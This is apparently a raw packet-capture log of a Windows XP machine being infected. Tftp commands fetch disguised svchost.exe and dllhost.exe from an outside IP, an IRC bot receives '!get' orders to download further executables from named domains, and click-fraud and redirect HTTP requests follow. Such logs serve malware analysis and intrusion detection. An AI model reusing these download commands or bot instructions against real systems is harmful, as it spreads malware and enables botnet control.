Client: dir dllcache\\\\tftpd.exe; Client: tftp -i 180.71.180.2 get svchost.exe wins\\\\SVCHOST.EXE


VICTIM:  	Microsoft Windows XP [Version 5.1.2600] 
VICTIM:  	(C) Copyright 1985-2001 Microsoft Corp.C:\\WINDOWS\\system32> 
VICTIM:  	dir wins\\dllhost.exe 
VICTIM:  	 Volume in drive C has no label. Volume Serial Number is 3CF1-1DE8 Directory of C:\\WINDOWS\\system32\\winsFile Not FoundC:\\WINDOWS\\system32> 
VICTIM:  	dir dllcache\\tftpd.exe 
VICTIM:  	 Volume in drive C has no label. Volume Serial Number is 3CF1-1DE8 Directory of C:\\WINDOWS\\system32\\dllcacheFile Not FoundC:\\WINDOWS\\system32> 
VICTIM:  	tftp -i 180.71.180.2 get svchost.exe wins\\SVCHOST.EXE 
VICTIM:  	\000\001svchost.exe\000octet\000 
VICTIM:  	\000\004\000\001 
VICTIM:  	\000\004\000\002 
VICTIM:  	\000\004\000\003 
VICTIM:  	\000\004\000\004 
VICTIM:  	\000\004\000\005 
VICTIM:  	\000\004\000\006 
VICTIM:  	\000\004\000\007 
VICTIM:  	\000\004\000\010 
VICTIM:  	\000\004\000\t 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\013 
VICTIM:  	\000\004\000\014 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\016 
VICTIM:  	\000\004\000\017 
VICTIM:  	\000\004\000\020 
VICTIM:  	\000\004\000\021 
VICTIM:  	\000\004\000\022 
VICTIM:  	\000\004\000\023 
VICTIM:  	\000\004\000\024 
VICTIM:  	\000\004\000\025 
VICTIM:  	\000\004\000\026 
VICTIM:  	\000\004\000\027 
VICTIM:  	\000\004\000\030 
VICTIM:  	\000\004\000\031 
VICTIM:  	\000\004\000\032 
VICTIM:  	\000\004\000\033 
VICTIM:  	\000\004\000\034 
VICTIM:  	\000\004\000\035 
VICTIM:  	\000\004\000\036 
VICTIM:  	\000\004\000\037 
VICTIM:  	\000\004\000  
VICTIM:  	\000\004\000! 
VICTIM:  	\000\004\000\ 
VICTIM:  	\000\004\000# 
VICTIM:  	\000\004\000\$ 
VICTIM:  	\000\004\000% 
VICTIM:  	\000\004\000& 
VICTIM:  	\000\004\000' 
VICTIM:  	\000\004\000( 
VICTIM:  	\000\004\000) 
VICTIM:  	\000\004\000* 
VICTIM:  	\000\004\000+ 
VICTIM:  	\000\004\000, 
VICTIM:  	\000\004\000- 
VICTIM:  	\000\004\000. 
VICTIM:  	\000\004\000/ 
VICTIM:  	\000\004\0000 
VICTIM:  	\000\004\0001 
VICTIM:  	\000\004\0002 
VICTIM:  	\000\004\0003 
VICTIM:  	\000\004\0004 
VICTIM:  	\000\004\0005 
VICTIM:  	\000\004\0006 
VICTIM:  	\000\004\0007 
VICTIM:  	\000\004\0008 
VICTIM:  	\000\004\0009 
VICTIM:  	\000\004\000: 
VICTIM:  	\000\004\000; 
VICTIM:  	\000\004\000< 
VICTIM:  	\000\004\000= 
VICTIM:  	\000\004\000> 
VICTIM:  	\000\004\000? 
VICTIM:  	\000\004\000@ 
VICTIM:  	\000\004\000A 
VICTIM:  	\000\004\000B 
VICTIM:  	\000\004\000C 
VICTIM:  	\000\004\000D 
VICTIM:  	\000\004\000E 
VICTIM:  	Transfer successful: 35088 bytes in 21 seconds, 1670 bytes/s 
VICTIM:  	C:\\WINDOWS\\system32> 
VICTIM:  	\000\001dllhost.exe\000octet\000 
VICTIM:  	\000\004\000\001 
VICTIM:  	tftp -i 180.71.180.2 get dllhost.exe wins\\DLLHOST.EXE 
VICTIM:  	\000\004\000\002 
VICTIM:  	\000\004\000\003 
VICTIM:  	\000\004\000\004 
VICTIM:  	\000\004\000\005 
VICTIM:  	\000\004\000\006 
VICTIM:  	\000\004\000\007 
VICTIM:  	\000\004\000\010 
VICTIM:  	\000\004\000\t 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\013 
VICTIM:  	\000\004\000\014 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\016 
VICTIM:  	\000\004\000\017 
VICTIM:  	\000\004\000\020 
VICTIM:  	\000\004\000\021 
VICTIM:  	\000\004\000\022 
VICTIM:  	\000\004\000\023 
VICTIM:  	\000\004\000\024 
VICTIM:  	\000\004\000\025 
VICTIM:  	\000\004\000\026 
VICTIM:  	\000\004\000\027 
VICTIM:  	\000\004\000\030 
VICTIM:  	\000\004\000\031 
VICTIM:  	\000\004\000\032 
VICTIM:  	\000\004\000\033 
VICTIM:  	\000\004\000\034 
VICTIM:  	\000\004\000\035 
VICTIM:  	\000\004\000\036 
VICTIM:  	\000\004\000\037 
VICTIM:  	\000\004\000  
VICTIM:  	\000\004\000! 
VICTIM:  	\000\004\000\ 
VICTIM:  	\000\004\000# 
VICTIM:  	\000\004\000\$ 
VICTIM:  	\000\004\000% 
VICTIM:  	\000\004\000& 
VICTIM:  	\000\004\000' 
VICTIM:  	\000\004\000( 
VICTIM:  	\000\004\000) 
VICTIM:  	\000\004\000* 
VICTIM:  	\000\004\000+ 
VICTIM:  	\000\004\000, 
VICTIM:  	\000\004\000- 
VICTIM:  	\000\004\000. 
VICTIM:  	\000\004\000/ 
VICTIM:  	\000\004\0000 
VICTIM:  	\000\004\0001 
VICTIM:  	\000\004\0002 
VICTIM:  	\000\004\0003 
VICTIM:  	Transfer successful: 25600 bytes in 16 seconds, 1600 bytes/s 
VICTIM:  	C:\\WINDOWS\\system32> 
VICTIM:  	wins\\DLLHOST.EXE 
VICTIM:  	NICK wvkuonorUSER m020501 . . :_ 
VICTIM:  	JOIN &virtu 
ATTACKER:	:u. PRIVMSG wvkuonor :!get http:/ad.ghura.pl/rus.php:u. PRIVMSG wvkuonor :!get http:/ad.ghura.pl/dm.exe:u. PRIVMSG wvkuonor :!get http:/ad.ghura.pl/rc.exe:u. PRIVMSG wvkuonor :!get http:/afretroactive.com/loaderadv701.exe:u. PRIVMSG wvkuonor :!get http:/slzzcom.com/ldt.txt 
VICTIM:  	GET /rus.php HTTP/1.0User-Agent: DownloadHost: ad.ghura.plPragma: no-cache 
ATTACKER:	GET /dm.exe HTTP/1.0User-Agent: DownloadHost: ad.ghura.plPragma: no-cache 
ATTACKER:	GET /rc.exe HTTP/1.0User-Agent: DownloadHost: ad.ghura.plPragma: no-cache 
ATTACKER:	GET /loaderadv701.exe HTTP/1.0User-Agent: DownloadHost: afretroactive.comPragma: no-cache 
ATTACKER:	GET /ldt.txt HTTP/1.0User-Agent: DownloadHost: slzzcom.comPragma: no-cache 
ATTACKER:	GET /vbn/abc1.txt HTTP/1.0User-Agent: Microsoft Internet ExplorerHost: slzzcom.comPragma: no-cache 
ATTACKER:	GET /vbn/bnc2.txt HTTP/1.0User-Agent: Microsoft Internet ExplorerHost: slzzcom.comPragma: no-cache 
ATTACKER:	GET /vbn/ckg3.txt HTTP/1.0User-Agent: Microsoft Internet ExplorerHost: slzzcom.comPragma: no-cache 
ATTACKER:	GET /vbn/dgh4.txt HTTP/1.0User-Agent: Microsoft Internet ExplorerHost: slzzcom.comPragma: no-cache 
ATTACKER:	GET /in.cgi?ka2 HTTP/1.0User-Agent: Microsoft Internet ExplorerHost: streq.cnPragma: no-cache 
VICTIM:  	\001\000\000\000\225vn+ 
ATTACKER:	GET /hn.gif HTTP/1.0Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: cao.iwillhavebigdick.com:82Connection: Keep-Alive 
VICTIM:  	\025\310\3741\225 ?\031\203\212s\344\235\212\343\212\374\373n\340^\317\366\215\010&\002\025\310\3741\226 ?\031\201\212t\344\221\212\321\213\340\370\342\344\225\212n\344\025\310\3741\224 ?\031\201\212v\344\221\212\341\201\346\375\327\213\373\212\031\203\373\265\025\310\3741\227 ?\031\201\212u\344\221\212\344\201\373\356\335\226\225\213n\344\225\025\310\3741\226 ?\031\207\212v\344\227\212\332\200\347\376\347\224\360\212o\344\025\310\3741\227 ?\031\201\212u\344\221\212\332\200\347\000\323\226\225\356n\344\225\025\310\3741\246 ?\031\214\212u\344\206\212\345\215\373\000\323\226\225\217n\344\225\213n\344\225\262x\344\225\212n\344\225\212o\345\027\337\3607\206 ?\031 
ATTACKER:	GET /list.php?c=CBD317C06CDA359930D7321A83C6F5241B82271CB98855FD3D0C3B7F4FF45B60122C4855C9BE4D2359205FC500457351C73DB146730A1E4FFC88B01B&v=2&t=0.5408289 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: mskla.comConnection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /tm/1.exe?t=0.7594568 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: slzzcom.comConnection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /p6.asp?MAC=00-0C-29-DB-13-FE&Publicer=bigbuy HTTP/1.1Host: in.7cy.netUser-Agent: ClickAdsByIE 0.7.4Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5Accept-Language: zh-cn,zh;q=0.5Referer: http:/in.7cy.net/p6.aspContent-Type: application/x-www-form-urlencodedConnection: Close 
ATTACKER:	GET /p6.asp?MAC=00-0C-29-DB-13-FE&Publicer=bigbuy HTTP/1.1Host: in1.7cy.netUser-Agent: ClickAdsByIE 0.7.4Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5Accept-Language: zh-cn,zh;q=0.5Referer: http:/in1.7cy.net/p6.aspContent-Type: application/x-www-form-urlencodedConnection: Close 
ATTACKER:	GET /?a=cobb-county-schools.com HTTP/1.0Accept: */*Referer: http:/www.google.com/url?sa=t&source=web&ct=res&cd=8&url=http:/redirect.hotkeys.com/?a=cobb-county-schools.com&ei=TFKmSv_ZE8KJ8QbI49XmDw&rct=j&q=redirect svs rdr&usg=AFQjCNEy91KeXd8I_CBpP158_PXD5IcHiwUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: redirect.hotkeys.comConnection: Keep-Alive 
ATTACKER:	GET /?a_id=1637&domainname=cobb-county-schools.com&adultfilter=off&popunder=off HTTP/1.0Accept: */*Referer: http:/www.google.com/url?sa=t&source=web&ct=res&cd=8&url=http:/redirect.hotkeys.com/?a=cobb-county-schools.com&ei=TFKmSv_ZE8KJ8QbI49XmDw&rct=j&q=redirect svs rdr&usg=AFQjCNEy91KeXd8I_CBpP158_PXD5IcHiwUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Connection: Keep-AliveHost: searchportal.information.com 
ATTACKER:	GET /?epl=06760034VGsLXARUBQdWFgYMVQQPXQ9VC1JeVlgDAxhWV01aRRwYRwFQVgpfR09TDQ4eAglcPkYDUQZHUhNcXUFMSA4eSkJDFRZeClxTDVVMAFcISUYTWFlEAhAEBRUQBw5LW0QXVlFHC10SVlZEAlQATEBVVxNRFRJRA1QFRAZRAB0GBxBHWEcLXQ1HQBEKTUxKAAJaE1EFQ01dWBUKUExLFldeCBoLAx0KAVBbA1JPAFcQCEcYGRVUC1pYDRIbVldVEQNTUF1HC10xdX8MYxQ8YiBeeCsMN1UqAQ45DHFCHQoCQwZBEVFcU0ABAhAVUQdKAAJaE1EFQ0NGQRJBR1FKHQYHEEZTRwtdJHVlC3MsJkFcV3gEbAIPKmp0IxFlBA0Aa2E9cQErW3EMRBIVQ19SClJeAFkBXgFXE1kOFWpXVFdXWgBRCURdVxFBWxFJX1MWU18CWANAQwZGQz4IUQgBAQ0XFVpHC0xQCl0JElUDEVsNOVEOTEBYE0EKDg8TVE1MW0UARkA9V0kRWlsPbwsHBVJSBFIGUQNXARERDkVAVlxRQ1haUgQeSQ1SRwQNDgxZAUBXBEcPUA1qXgVcAwUNHldQEVBTDUpAWFRRD1UQCltDFV8IVwNoClEKUEdGUFlKV1k6QU0SXQQDXEYMFgMPVAoRbAZbCVAPUGgLEggF HTTP/1.0Accept: */*Referer: http:/searchportal.information.com/?a_id=1637&domainname=cobb-county-schools.com&adultfilter=off&popunder=offUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: searchportal.information.comConnection: Keep-AliveCookie: cobb-county-schools.com=search%3A0%7Cexitpop%3A0%7Clload%3A0%7Clvisit%3A1278385863%7Cclick%3A0%7Cblocked%3A0; ident=search%3A0%7Cexitpop%3A0%7Clload%3A0%7Clvisit%3A1278385863%7Cclick%3A0%7Cblocked%3A0%7Ctoken%3Avuztusuvyxrpqvxt; Spusr=a0015ac2acc4c329ec7eaf9 
ATTACKER:	GET /css/605/landing/en.css HTTP/1.0Accept: */*Referer: http:/searchportal.information.com/?a_id=1637&domainname=cobb-county-schools.com&adultfilter=off&popunder=offUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: spi.domainsponsor.comConnection: Keep-Alive